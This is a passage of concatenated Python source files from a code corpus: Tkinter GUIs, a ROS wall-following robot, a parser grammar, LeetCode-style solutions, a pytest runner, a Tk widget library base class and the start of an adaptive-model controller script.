tk.Button(master=frame1, text=lang[\"Output (REQUIRED)\"], command=selectOutput)\n btn_output.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n rely += devy\n\n progress = ttk.Progressbar(master=frame1, orient=tk.HORIZONTAL, mode='determinate', value=0)\n progress.place(relwidth=0.7, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n\n btn_blend = tk.Button(master=frame1, text=lang[\"Blend & Export\"], command=startBlending)\n btn_blend.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n loadConfig()\n clearLog()\n\n try:\n ctypes.windll.shcore.SetProcessDpiAwareness(1)\n ScaleFactor = ctypes.windll.shcore.GetScaleFactorForDevice(0)\n root.tk.call('tk', 'scaling', ScaleFactor / 75) # DPI settings\n root_view.tk.call('tk', 'scaling', ScaleFactor / 75)\n root_view.iconphoto(False, tk.PhotoImage(file='./Source/icon-small.png'))\n root.iconphoto(False, tk.PhotoImage(file='./Source/icon-small.png'))\n except:\n pass\n\n\n def disable_event():\n if fb.isRunning:\n tkinter.messagebox.showinfo(lang[\"Notice\"], lang[\"Please stop blending before quit!\"])\n else:\n root.destroy()\n\n\n def close_view():\n root_view.withdraw()\n\n\n root.protocol(\"WM_DELETE_WINDOW\", disable_event)\n root_view.protocol(\"WM_DELETE_WINDOW\", close_view)\n frame1.tkraise()\n showPreview()\n root.mainloop()\n","sub_path":"SourceCode/FanBlender_GUI.py","file_name":"FanBlender_GUI.py","file_ext":"py","file_size_in_byte":42455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"106017447","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nAuthor : Ntwali Bashige\nCopyright : Copyright 2019 - Ntwali Bashige\nLicense : MIT\nVersion : 0.0.1\nMaintainer : Ntwali Bashige\nEmail : ntwali.bashige@gmail.com\n\"\"\"\n\nfrom asm.parsing.parselets.expressions import LiteralParselet, AssignmentParselet, StaticExpressionParselet, DynamicExpressionParselet\nfrom asm.parsing.parselets.declarations import CircuitDeclarationParselet\nfrom common.token_type import TokenType\n\n\nclass Grammar(object):\n \"\"\"\n\n \"\"\"\n parselets = {\n TokenType.CIRCUIT : CircuitDeclarationParselet(),\n TokenType.IDENTIFIER : StaticExpressionParselet(),\n TokenType.PERCENT : DynamicExpressionParselet(),\n TokenType.EQUAL : AssignmentParselet(),\n TokenType.CBINARY : LiteralParselet(),\n }\n","sub_path":"as/src/asm/parsing/grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"218442667","text":"#!/usr/bin/env python\nimport math\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import LaserScan\n\n\n# Check if there seems to be an object in front of the robot, on the data from the left value to the right value, if any of them are less than minRange then return's false\ndef freeFront(data, left, right, minRange):\n for i in range(left, right):\n ranger = data[i]\n if ranger < minRange:\n return False\n\n return True\n\n\n# Returns true if the robot can move forward the specified distance\n# (Takes into account width of robot)\ndef canMoveForward(data, distance):\n robotWidth = 1.5\n # How many reading it will check (distributed evenly across 180 degrees)\n values = range(1, 30)\n for i in values:\n maxReading = abs((robotWidth/2)/math.cos(math.radians((180/values[-1])*i)))\n if maxReading > distance:\n maxReading = distance\n reading = data[(len(data) / values[-1]) * i]\n #rospy.loginfo(\"Reading \"+str(maxReading) + \" ~ index \"+str((len(data) / values[-1]) * i))\n if reading < maxReading:\n return reading\n return -1\n\n\ndef findAverage(data, low, high):\n temp = 0;\n count = 0;\n for i in range(low, high):\n if (data[i] != float('NaN') and data[i] != float('Inf')):\n temp = temp + data[i]\n count = count + 1\n if count == 0:\n return 20\n else:\n return temp / count\n\n\ndef findGreater(data, fLow, fHigh, sLow, sHigh):\n firstAverage = findAverage(data, fLow, fHigh)\n secondAverage = findAverage(data, sLow, sHigh)\n\n rospy.loginfo(\n \"Front \" + str(firstAverage) + \"; Back \" + str(secondAverage) + \" = \" + str(firstAverage - secondAverage))\n\n return firstAverage - secondAverage\n\n\ndef laser_callback(laser_data):\n global detectedWall\n\n new_speed = Twist()\n\n maxSpeed = 0.3# 0.25\n maxRotateSpeed = 0.3# 0.3 # negative value = rotate right\n divider = 1\n\n # Values of laser indicators that indicate front\n frontLeft = 200\n frontRight = 300\n minRange = 0.75\n\n # Detected first wall\n maxRangeLeft = 1.5\n desRangeLeftMin = 0.75\n desRangeLeftMax = 0.76\n\n # Range to indicate back right\n firstLower = 0\n firstHigher = 64\n # Range to indicate front right\n secondLower = 64\n secondHigher = 128\n\n rospy.loginfo(\"STUFF \" + str(detectedWall))\n\n collision = canMoveForward(laser_data.ranges, minRange)\n\n if collision != -1:\n # find new wall by rotating\n if collision < 0.4:\n new_speed.linear.x = 0.0\n else:\n new_speed.linear.x = maxSpeed * 0.5\n new_speed.angular.z = maxRotateSpeed * 2\n rospy.loginfo(\"Rotating for collision \")\n else:\n new_speed.linear.x = maxSpeed\n averageLeft = findAverage(laser_data.ranges, firstLower, secondHigher)\n # if have a wall to our right\n if averageLeft < maxRangeLeft:\n if detectedWall < 100:\n detectedWall += 5\n if desRangeLeftMin <= averageLeft <= desRangeLeftMax:\n # wall is nicely away from us\n rospy.loginfo(\"Wall is nicely away from us\")\n new_speed.linear.x = maxSpeed\n new_speed.angular.z = 0.0\n if averageLeft < desRangeLeftMin:\n # wall is too close: rotate away from wall\n rospy.loginfo(\"Wall is too close\")\n new_speed.linear.x = maxSpeed\n new_speed.angular.z = maxRotateSpeed\n if averageLeft > desRangeLeftMax:\n # wall is too far: rotate towards wall\n rospy.loginfo(\"Wall is too far\")\n new_speed.linear.x = maxSpeed\n new_speed.angular.z = -(maxRotateSpeed)\n\n if findGreater(laser_data.ranges, firstLower, firstHigher, secondLower, secondHigher) < -1:\n rospy.loginfo(\"Detected convex wall\")\n new_speed.linear.x = maxSpeed\n new_speed.angular.z = -(maxRotateSpeed)\n else:\n # No wall to our left\n new_speed.linear.x = maxSpeed\n if detectedWall > 0:\n detectedWall -= 1\n if detectedWall > 25:\n new_speed.angular.z = -maxRotateSpeed * 1.5\n\n pub.publish(new_speed)\n\n\nif __name__ == '__main__':\n detectedWall = 0\n rospy.init_node('obstacle_stopper')\n\n raw_input('turn on motors and press enter to start')\n\n rospy.Subscriber('base_scan', LaserScan, laser_callback)\n pub = rospy.Publisher('cmd_vel', Twist, queue_size=100)\n rospy.spin()\n","sub_path":"exercise2/src/wall_hugger.py","file_name":"wall_hugger.py","file_ext":"py","file_size_in_byte":4592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"643487731","text":"#!/usr/bin/python\n\nimport sys\n\n\ndef making_change(amount, denominations):\n # Initialize cache\n cache = [0] * (amount + 1)\n cache[0] = 1\n\n # For each possible coin, starting with the smallest\n for coin in denominations:\n # For every amount between that coin value and the total amount\n for amount2 in range(coin, amount + 1):\n # Add the number of solutions found if we took out that coin\n cache[amount2] += cache[amount2 - coin]\n\n return cache[amount]\n\nif __name__ == \"__main__\":\n # Test our your implementation from the command line\n # with `python making_change.py [amount]` with different amounts\n if len(sys.argv) > 1:\n denominations = [1, 5, 10, 25, 50]\n amount = int(sys.argv[1])\n else:\n print(\"Usage: making_change.py [amount]\")\n","sub_path":"making_change/making_change.py","file_name":"making_change.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"365445636","text":"#coding:utf-8\nimport os\nimport pytest\nimport argparse\nfrom config import BaseConfig\nfrom common.tools import get_case_dir,send_dingding\nfrom common.utils import dingTalk\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(description=\"argparse\")\n parser.add_argument('--product', type=str, default=BaseConfig.current_name)\n return parser\n\n\nif __name__ == \"__main__\":\n parser = get_parser()\n args = parser.parse_args()\n BaseConfig.current_name = args.product\n # 获取要执行的产品的用例目录\n test_case_dir = get_case_dir(args.product)\n print(\"********此次执行的产品测试用例是:%s********\"%test_case_dir)\n\n #删除之前报告\n os.system('rm ./report/tmp/*.json')\n # 生成报告数据\n pytest.main(['-v', '-s', test_case_dir, '--alluredir', './report/tmp'])\n # 打开报告\n os.system('allure serve ./report/tmp')\n\n # 发送钉钉\n send_dingding(args.product)\n\n\n\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"500280972","text":"#!/usr/bin/env python3\n\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import filedialog\n\nfrom machine import Machine\nfrom gui_mem_inspect import MemInspect\n\nclass Gui(Tk):\n def __init__(self, machine):\n super().__init__()\n self.machine = machine\n self.title(\"Windlass\")\n self.columnconfigure(0, weight=1)\n self.rowconfigure(0, weight=1)\n\n # Create mainframe inside of root window. Seems redundant, but\n # ttk widgets can be themed, while regular tkninter widgets can't.\n mainframe = ttk.Frame(self, padding=\"3 3 3 3\", relief=\"flat\")\n mainframe.grid(column=0, row=0, sticky=(N, S, E, W))\n mainframe.columnconfigure(0, weight=1)\n mainframe.rowconfigure(0, weight=1)\n\n # Create topframe that will hold the buttons & registers.\n topframe = ttk.Frame(mainframe, relief=\"flat\")\n topframe.grid(column=0, row=0, sticky=(N, S, E, W))\n topframe.columnconfigure(0, weight=1)\n topframe.rowconfigure(0, weight=1)\n \n\n # --------------------------------------------------------------------\n # BUTTONS\n # --------------------------------------------------------------------\n button_frame = ttk.Frame(topframe, relief=\"sunken\")\n button_frame.grid(column=0, row=0)\n buttons = [ ttk.Button(button_frame, text=\"Load\", command=self._load)\n , ttk.Button(button_frame, text=\"Step\", command=self._step)\n , ttk.Button(button_frame, text=\"Run\", command=self._run)\n , ttk.Button(button_frame, text=\"Stop\", command=self._stop)\n ]\n for button in buttons:\n button.pack(side=LEFT)\n\n # --------------------------------------------------------------------\n # REGISTERS & IO\n # --------------------------------------------------------------------\n # StringVars for register Entry widgets.\n self.PC = StringVar()\n self.IR = StringVar()\n self.OR = StringVar()\n self.ACC = StringVar()\n self.input = StringVar()\n self.output = StringVar()\n \n self._copy_registers()\n \n register_frame = ttk.Frame(topframe)\n register_frame.grid(column=0, row=1, pady=3, sticky=(N, S, E, W))\n \n PC_label = ttk.Label(register_frame, text=\"PC\")\\\n .grid(row=0, column=0, sticky=W)\n PC_entry = Entry(register_frame)\n PC_entry.config(width=7, textvariable=self.PC, relief=\"flat\")\n PC_entry.grid(row=0, column=1, sticky=E)\n \n IR_label = ttk.Label(register_frame, text=\"IR\")\\\n .grid(row=1, column=0, sticky=W)\n IR_entry = Entry(register_frame)\n IR_entry.config(width=7, textvariable=self.IR, relief=\"flat\")\n IR_entry.grid(row=1, column=1, sticky=E)\n \n OR_label = ttk.Label(register_frame, text=\"OR\")\\\n .grid(row=2, column=0, sticky=W)\n OR_entry = Entry(register_frame)\n OR_entry.config(width=7, textvariable=self.OR, relief=\"flat\")\n OR_entry.grid(row=2, column=1, sticky=E)\n \n ACC_label = ttk.Label(register_frame, text=\"ACC\")\\\n .grid(row=3, column=0, sticky=W)\n ACC_entry = Entry(register_frame)\n ACC_entry.config(width=7, textvariable=self.ACC, relief=\"flat\")\n ACC_entry.grid(row=3, column=1, sticky=E)\n\n # --------------------------------------------------------------------\n # STATUS\n # --------------------------------------------------------------------\n # status_frame = ttk.Frame(mainframe)\n # status_frame.grid(column=1, row=2, sticky=(S, E, W))\n\n # self.status = StringVar()\n # self.status.set('HALTed')\n # status = Label(status_frame, textvariable=self.status)\n # status.pack(fill=BOTH)\n \n # --------------------------------------------------------------------\n # I/O\n # --------------------------------------------------------------------\n bottomframe = ttk.Frame(mainframe)\n bottomframe.grid(row=1, column=0, sticky=(N, S, E, W))\n\n self.console = Text(bottomframe)\n self.console.config(width=80, height=12)\n self.console.grid(row=0, column=0, sticky=(N, S, E, W))\n self.console.config(state=DISABLED)\n # TODO: Disable scrolling w/ mousewheel.\n # TODO: Lock view to bottom of buffer ('autoscroll')\n\n self.input = Entry(bottomframe)\n self.input.config(width=80)\n self.input.grid(row=1, column=0, sticky=(E, W))\n self.input.config(state=DISABLED)\n\n self._print(\"Machine ready.\")\n\n\n # --------------------------------------------------------------------\n # BUTTON COMMANDS\n # --------------------------------------------------------------------\n \n def _load(self):\n self.machine.load_text(filedialog.askopenfilename())\n\n #self.status.set(\"Program loaded. Click step to step through\")\n\n def _step(self):\n self.machine.step()\n self._copy_registers()\n #if self.machine.needs_input:\n # self.status.set(\"Machine needs input.\\n\"\n # \"Enter value in input field and press enter.\")\n \n def _run(self):\n self.machine.run()\n self._copy_registers()\n #if self.machine.needs_input:\n # self.status.set(\"Machine needs input.\\n\"\n # \"Enter value in input field and press enter.\")\n\n def _stop(self):\n self.machine.running = False # TODO: Reduce coupling\n\n # --------------------------------------------------------------------\n # PRIVATE HELEPERS\n # --------------------------------------------------------------------\n\n def _copy_registers(self):\n # TODO: Reduce coupling\n self.PC.set(self.machine.PC)\n self.OR.set(self.machine.OR)\n self.IR.set(str(self.machine.IR))\n self.ACC.set(self.machine.ACC)\n\n def _give_input(self, *args):\n self.machine.take_input(self.input.get())\n self._copy_registers()\n #self.status.set(\"Input accepted, HALT'd.\")\n\n def _print(self, s):\n self.console.config(state=NORMAL)\n self.console.insert(END, s + \"\\n\")\n self.console.config(state=DISABLED)\n\nif __name__ == \"__main__\":\n m = Machine()\n g = Gui(m)\n mi = MemInspect(g)\n g.mainloop()\n","sub_path":"gui_main.py","file_name":"gui_main.py","file_ext":"py","file_size_in_byte":6443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"570807433","text":"class Solution:\n def maxSlidingWindow0(self, nums, k: int):\n '''\n 给定一个数组 nums,有一个大小为 k 的滑动窗口从数组的最左侧移动到数组的最右侧。\n 你只可以看到在滑动窗口 k 内的数字。滑动窗口每次只向右移动一位。\n 返回滑动窗口最大值。\n 输入: nums = [1,3,-1,-3,5,3,6,7], 和 k = 3\n 输出: [3,3,5,5,6,7]\n '''\n if len(nums) <= 0:\n return []\n\n maxAry = [None] * (len(nums) - k + 1)\n\n for i in range(len(maxAry)):\n maxAry[i] = max(nums[i:i + k])\n\n return maxAry\n\n def maxSlidingWindow(self, nums, k: int):\n '''\n 给定一个数组 nums,有一个大小为 k 的滑动窗口从数组的最左侧移动到数组的最右侧。\n 你只可以看到在滑动窗口 k 内的数字。滑动窗口每次只向右移动一位。\n 返回滑动窗口最大值。\n 输入: nums = [1,3,-1,-3,5,3,6,7], 和 k = 3\n 输出: [3,3,5,5,6,7]\n '''\n if len(nums) <= 0:\n return nums\n max_ary = [max(nums[:k])]\n max_val = max_ary[0]\n for i in range(k, len(nums)):\n if nums[i] > max_val:\n max_val = nums[i]\n # 最大值滑出窗口\n elif nums[i - k] == max_val:\n max_val = max(nums[i - k + 1:i + 1])\n max_ary.append(max_val)\n return max_ary\n\n\ns = Solution()\nprint(s.maxSlidingWindow([1, 3, -1, -3, 5, 3, 6, 7], 3))\nprint(s.maxSlidingWindow([1, -1], 1))\nprint(s.maxSlidingWindow([7, 2, 4], 2))\n","sub_path":"Leetcode/239.maxSlidingWindow.py","file_name":"239.maxSlidingWindow.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"504138515","text":"from __future__ import annotations\n\nimport collections.abc\nimport contextlib\nimport re\nfrom functools import partial, partialmethod\nfrom typing import Any, Callable, Iterator, Literal\n\nfrom ._constants import _BINDING_ALIASES, _KEYSYMS, _VALID_STATES\nfrom ._event import Event\nfrom ._layouts import LayoutManager\nfrom ._misc import ScreenDistance, TukaanError\nfrom ._utils import (\n _callbacks,\n _widgets,\n create_command,\n from_tcl,\n get_tcl_interp,\n py_to_tcl_arguments,\n reversed_dict,\n update_before,\n)\n\n\nclass ChildStatistics:\n def __init__(self, widget) -> None:\n self._widget = widget\n\n def number_of_type(self, type) -> int:\n try:\n return self._widget._child_type_count[type]\n except KeyError:\n return 0\n\n @property\n def children(self) -> list[BaseWidget]:\n return list(self._widget._children.values())\n\n @property\n def grid_managed_children(self) -> tuple:\n return tuple(\n self._widget.from_tcl(elem)\n for elem in self._widget._tcl_call((str,), \"grid\", \"slaves\", self._widget)\n )\n\n @property\n def position_managed_children(self) -> tuple:\n return tuple(\n self._widget.from_tcl(elem)\n for elem in self._widget._tcl_call((str,), \"place\", \"slaves\", self._widget)\n )\n\n\nclass MethodAndPropMixin:\n _tcl_call: Callable\n _keys: dict[str, Any]\n layout: LayoutManager\n tcl_path: str\n wm_path: str\n parent: TkWidget\n child_stats: ChildStatistics\n\n def __repr__(self) -> str:\n return (\n f\"\"\n )\n\n __str__ = __repr__\n\n def _repr_details(self) -> str:\n # overridden in subclasses\n return \"\"\n\n @property\n def is_busy(self) -> bool:\n return self._tcl_call(bool, \"tk\", \"busy\", \"status\", self)\n\n @is_busy.setter\n def is_busy(self, is_busy) -> None:\n if is_busy:\n self._tcl_call(None, \"tk\", \"busy\", \"hold\", self)\n else:\n self._tcl_call(None, \"tk\", \"busy\", \"forget\", self)\n\n @contextlib.contextmanager\n def busy(self):\n self.is_busy = True\n try:\n yield\n finally:\n self.is_busy = False\n\n @property\n def id(self) -> int:\n return self._tcl_call(int, \"winfo\", \"id\", self.tcl_path)\n\n def _cget(self, key: str) -> Any:\n if isinstance(self._keys[key], tuple):\n type_spec, key = self._keys[key]\n else:\n type_spec = self._keys[key]\n\n if type_spec == \"func\":\n # return a callable func, not tcl name\n result = self._tcl_call(str, self, \"cget\", f\"-{key}\")\n return _callbacks[result]\n\n if isinstance(type_spec, dict):\n result = self._tcl_call(str, self, \"cget\", f\"-{key}\")\n return reversed_dict(type_spec)[result]\n\n return self._tcl_call(type_spec, self, \"cget\", f\"-{key}\")\n\n def config(self, **kwargs) -> None:\n for key in tuple(kwargs.keys()):\n if isinstance(self._keys[key], tuple):\n # if key has a tukaan alias, use the tuple's 2-nd item as the tcl key\n kwargs[self._keys[key][1]] = kwargs.pop(key)\n\n get_tcl_interp()._tcl_call(\n None, self, \"configure\", *py_to_tcl_arguments(**kwargs)\n )\n\n @classmethod\n def from_tcl(cls, tcl_value: str) -> TkWidget:\n # unlike in teek, this method won't raise a TypeError,\n # if the return widget, and the class you call it on isn't the same\n # this could be annoying, but very useful if you don't know\n # what kind of widget it is and just want to get it\n\n # teek.Button.from_tcl(teek.Label().to_tcl())\n # >>> TypeError: blablabla\n\n # tukaan.Button.from_tcl(teek.tukaan().to_tcl())\n # >>> '.app.label_1'\n\n if tcl_value == \".\":\n return get_tcl_interp()\n\n return _widgets[tcl_value]\n\n def to_tcl(self) -> str:\n return self.tcl_path\n\n @property\n def _class(self):\n return self._tcl_call(str, \"winfo\", \"class\", self)\n\n @property\n def keys(self) -> list:\n return sorted(self._keys.keys())\n\n @property\n def bbox(self) -> tuple:\n return (self.x, self.y, self.x + self.width, self.y + self.height)\n\n @property # type: ignore\n @update_before\n def x(self) -> int:\n return self._tcl_call(int, \"winfo\", \"rootx\", self)\n\n @property # type: ignore\n @update_before\n def y(self) -> int:\n return self._tcl_call(int, \"winfo\", \"rooty\", self)\n\n @property # type: ignore\n @update_before\n def width(self) -> int:\n return self._tcl_call(int, \"winfo\", \"width\", self)\n\n @property # type: ignore\n @update_before\n def height(self) -> int:\n return self._tcl_call(int, \"winfo\", \"height\", self)\n\n def focus(self):\n self._tcl_call(None, \"focus\", self)\n\n def hide(self):\n if self.tcl_path == \".app\" or self._class == \"Toplevel\":\n self._tcl_call(None, \"wm\", \"withdraw\", self.wm_path)\n elif self.layout._real_manager == \"grid\":\n self._tcl_call(None, \"grid\", \"remove\", self.tcl_path)\n elif self.layout._real_manager == \"place\":\n self._temp_position_info = self._tcl_call(\n {\"-x\": int, \"-y\": int, \"-anchor\": str, \"-width\": int, \"-height\": int},\n \"place\",\n \"info\",\n self.tcl_path,\n )\n self._tcl_call(None, \"place\", \"forget\", self.tcl_path)\n\n def unhide(self):\n if self.tcl_path == \".app\" or self._class == \"Toplevel\":\n self._tcl_call(None, \"wm\", \"deiconify\", self.wm_path)\n elif self.layout._real_manager == \"grid\":\n self._tcl_call(None, \"grid\", \"configure\", self.tcl_path)\n elif self.layout._real_manager == \"place\":\n self._tcl_call(\n None,\n (\n \"place\",\n \"configure\",\n self.tcl_path,\n *(\n elem\n for key, value in self._temp_position_info.items()\n for elem in (key, value)\n if value is not None\n ),\n ),\n )\n\n def __parse_sequence(self, sequence: str) -> str:\n tcl_sequence = sequence\n regex_str = r\"\"\n\n if sequence in _BINDING_ALIASES:\n tcl_sequence = _BINDING_ALIASES[sequence]\n elif re.match(regex_str, sequence):\n search = re.search(regex_str, sequence)\n up_or_down = {\"Down\": \"Press\", \"Up\": \"Release\"}\n thing = search.group(2) # type: ignore\n tcl_sequence = f\"\" # type: ignore\n\n return tcl_sequence\n\n def _call_bind(\n self,\n widget_or_all: MethodAndPropMixin | Literal[\"all\"],\n sequence_s: tuple[str, ...] | str,\n func: Callable | Literal[\"\"],\n overwrite: bool,\n sendevent: bool,\n data: Any,\n ) -> None:\n def _real_func(func: Callable, data: Any, sequence: str, *args):\n event = Event(sequence, func, data)\n\n for (_, type_, attr), string_value in zip(_BINDING_SUBSTS, args):\n try:\n value = from_tcl(type_, string_value)\n if attr == \"keysymbol\":\n if value == \"??\":\n value = None\n elif value in _KEYSYMS.values():\n value = reversed_dict(_KEYSYMS)[string_value]\n except (ValueError, TukaanError):\n # ValueError when trying to int(\"??\")\n value = None\n\n setattr(event, attr, value)\n\n return func() if not sendevent else func(event)\n\n subst_str = \" \".join(subs for subs, *_ in _BINDING_SUBSTS)\n\n if isinstance(sequence_s, str):\n sequence_s = (sequence_s,)\n for sequence in sequence_s:\n self._tcl_call(\n None,\n \"bind\",\n widget_or_all,\n self.__parse_sequence(sequence),\n f\"{'' if overwrite else '+'} if\"\n + f\" {{[{create_command(partial(_real_func, func, data, sequence))}\"\n + f\" {subst_str}] eq {{break}} }} {{ break }}\"\n if callable(func)\n else \"\", # FIXME: this is disgustingly unreadable\n )\n\n def _bind(\n self,\n what,\n sequence: tuple[str, ...] | str,\n func: Callable,\n overwrite: bool = False,\n sendevent: bool = False,\n data=None,\n ) -> None:\n self._call_bind(\n what if what == \"all\" else self, sequence, func, overwrite, sendevent, data\n )\n\n def _unbind(self, what, sequence: str):\n self._call_bind(\n what if what == \"all\" else self, sequence, \"\", True, False, None\n )\n\n def generate_event(self, sequence: str):\n self._tcl_call(None, \"event\", \"generate\", self, self.__parse_sequence(sequence))\n\n bind = partialmethod(_bind, \"self\")\n unbind = partialmethod(_unbind, \"self\")\n bind_global = partialmethod(_bind, \"all\")\n unbind_global = partialmethod(_unbind, \"all\")\n\n\nclass TukaanWidget:\n \"\"\"Base class for every Tukaan widget\"\"\"\n\n ...\n\n\nclass TkWidget(MethodAndPropMixin):\n \"\"\"Base class for every Tk-based widget\"\"\"\n\n layout: LayoutManager\n\n def __init__(self):\n self._children: dict[str, BaseWidget] = {}\n self._child_type_count: dict[type, int] = {}\n _widgets[self.tcl_path] = self\n self.child_stats = ChildStatistics(self)\n\n\n_BINDING_SUBSTS = (\n (\"%D\", float, \"delta\"),\n (\"%K\", str, \"keysymbol\"),\n (\"%k\", str, \"keycode\"),\n (r\"%W\", TkWidget, \"widget\"),\n (r\"%X\", ScreenDistance, \"rel_x\"),\n (r\"%Y\", ScreenDistance, \"rel_y\"),\n (r\"%height\", ScreenDistance, \"height\"),\n (r\"%width\", ScreenDistance, \"width\"),\n (r\"%x\", ScreenDistance, \"x\"),\n (r\"%y\", ScreenDistance, \"y\"),\n)\n\n\nclass StateSet(collections.abc.MutableSet):\n \"\"\"\n Object that contains the state of the widget,\n though it inherits from MutableSet, it behaves like a list\n \"\"\"\n\n def __init__(self, widget: TkWidget) -> None:\n self._widget = widget\n\n def __repr__(self) -> str:\n return f\"\"\n\n def __iter__(self) -> Iterator[str]:\n return iter(self._widget._tcl_call([str], self._widget, \"state\"))\n\n def __len__(self) -> int:\n return len(self._widget._tcl_call([str], self._widget, \"state\"))\n\n def __contains__(self, state: object) -> bool:\n return self._widget._tcl_call(bool, self._widget, \"instate\", state)\n\n def add_or_discard(self, action: Literal[\"add\", \"discard\"], state: str) -> None:\n if state not in _VALID_STATES:\n raise RuntimeError\n if action == \"discard\":\n state = f\"!{state}\"\n\n self._widget._tcl_call(None, self._widget, \"state\", state)\n\n add: Callable[[str], None] = partialmethod(add_or_discard, \"add\")\n discard: Callable[[str], None] = partialmethod(add_or_discard, \"discard\")\n\n\nclass BaseWidget(TkWidget):\n _keys: dict[str, Any | tuple[Any, str]]\n\n def __init__(self, parent: TkWidget | None, **kwargs) -> None:\n self.parent = parent or get_tcl_interp()\n self.tcl_path = self._give_me_a_name()\n self._tcl_call: Callable = get_tcl_interp()._tcl_call\n\n TkWidget.__init__(self)\n\n self.parent._children[self.tcl_path] = self\n\n self._tcl_call(\n None, self._tcl_class, self.tcl_path, *py_to_tcl_arguments(**kwargs)\n )\n\n self.layout = LayoutManager(self)\n self._temp_manager = None\n\n if self._tcl_class.startswith(\"ttk::\"):\n self.state = StateSet(self)\n # else:\n # need to define separately for non-ttk widgets\n\n def __setattr__(self, key: str, value: Any) -> None:\n if key in self._keys.keys():\n self.config(**{key: value})\n else:\n super().__setattr__(key, value)\n\n def __getattr__(self, key: str) -> Any:\n if key in self._keys.keys():\n return self._cget(key)\n else:\n return super().__getattribute__(key)\n\n def _give_me_a_name(self) -> str:\n klass = type(self)\n\n # FIXME: more elegant way to count child types\n # itertools.count isn't good, because we need plain ints\n\n count = self.parent._child_type_count.get(klass, 0) + 1\n self.parent._child_type_count[klass] = count\n\n return f\"{self.parent.tcl_path}.{klass.__name__.lower()}_{count}\"\n\n def destroy(self):\n for child in self.child_stats.children:\n child.destroy()\n\n self._tcl_call(None, \"destroy\", self.tcl_path)\n del self.parent._children[self.tcl_path]\n del _widgets[self.tcl_path]\n","sub_path":"tukaan/_base.py","file_name":"_base.py","file_ext":"py","file_size_in_byte":13192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"313507126","text":"import numpy as np\nimport os.path\nfrom argparse import ArgumentParser\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import AdaBoostClassifier, RandomForestClassifier\nfrom sklearn.cluster import KMeans\nfrom typing import List, Optional, Tuple\n\nfrom dataset.dataset import Dataset, DataSeries\nfrom models.adaptive_model import AdaptiveModel\nfrom threshold_optimization.optimize_thresholds import get_serialized_info\nfrom utils.rnn_utils import get_logits_name, get_states_name, AdaptiveModelType, get_input_name\nfrom utils.np_utils import index_of, round_to_precision\nfrom utils.constants import OUTPUT, BIG_NUMBER, SMALL_NUMBER, INPUTS, SEQ_LENGTH, DROPOUT_KEEP_RATE\nfrom utils.file_utils import save_pickle_gz, read_pickle_gz, extract_model_name\nfrom controllers.distribution_prior import DistributionPrior\n\n\nPOWER = np.array([24.085, 32.776, 37.897, 43.952, 48.833, 50.489, 54.710, 57.692, 59.212, 59.251])\nVIOLATION_FACTOR = 0.01\nUNDERSHOOT_FACTOR = 0.01\nCONTROLLER_PATH = 'model-logistic-controller-{0}.pkl.gz'\nMARGIN = 1000\nMIN_INIT = 0.8\nMAX_INIT = 1.0\nC = 0.01\nNOISE = 0.01\n\n\ndef get_power_for_levels(power: np.ndarray, num_levels: int) -> np.ndarray:\n assert num_levels <= len(power), 'Must have fewer levels than power estimates' \n\n if len(power) == num_levels:\n return power\n\n median_index = int(len(power) / 2)\n start_index = median_index - int(num_levels / 2)\n end_index = start_index + num_levels\n return power[start_index:end_index]\n\n\ndef fetch_model_states(model: AdaptiveModel, dataset: Dataset, series: DataSeries):\n logit_ops = [get_logits_name(i) for i in range(model.num_outputs)]\n state_ops = [get_states_name(i) for i in range(model.num_outputs)]\n stop_output_ops = ['stop_output_{0}'.format(i) for i in range(model.num_outputs)]\n\n data_generator = dataset.minibatch_generator(series=series,\n batch_size=model.hypers.batch_size,\n metadata=model.metadata,\n should_shuffle=False)\n # Lists to keep track of model results\n labels: List[np.ndarray] = []\n states: List[np.ndarray] = []\n stop_outputs: List[np.ndarray] = []\n level_predictions: List[np.ndarray] = []\n level_logits: List[np.ndarray] = []\n\n # Index of state to use for stop/start prediction\n states_index = 0\n if model.model_type == AdaptiveModelType.CASCADE:\n states_index = -1\n\n seq_length = model.metadata[SEQ_LENGTH]\n num_sequences = model.num_sequences\n\n for batch_num, batch in enumerate(data_generator):\n # Compute the predicted log probabilities\n feed_dict = model.batch_to_feed_dict(batch, is_train=False)\n model_results = model.execute(feed_dict, logit_ops + state_ops + stop_output_ops)\n\n first_states = np.concatenate([np.expand_dims(np.squeeze(model_results[op][states_index]), axis=1) for op in state_ops], axis=1) # [B, D]\n\n inputs = np.array(batch[INPUTS])\n states.append(first_states)\n\n # Concatenate logits into a [B, L, C] array (logit_ops is already ordered by level).\n # For reference, L is the number of levels and C is the number of classes\n logits_concat = np.concatenate([np.expand_dims(model_results[op], axis=1) for op in logit_ops], axis=1)\n level_logits.append(logits_concat)\n\n # Compute the predictions for each level\n level_pred = np.argmax(logits_concat, axis=-1) # [B, L]\n level_predictions.append(level_pred)\n\n true_values = np.squeeze(batch[OUTPUT])\n labels.append(true_values)\n\n batch_stop_outputs = np.concatenate([np.expand_dims(model_results[op], axis=1) for op in stop_output_ops], axis=1) # [B, T]\n stop_outputs.append(batch_stop_outputs)\n\n states = np.concatenate(states, axis=0)\n 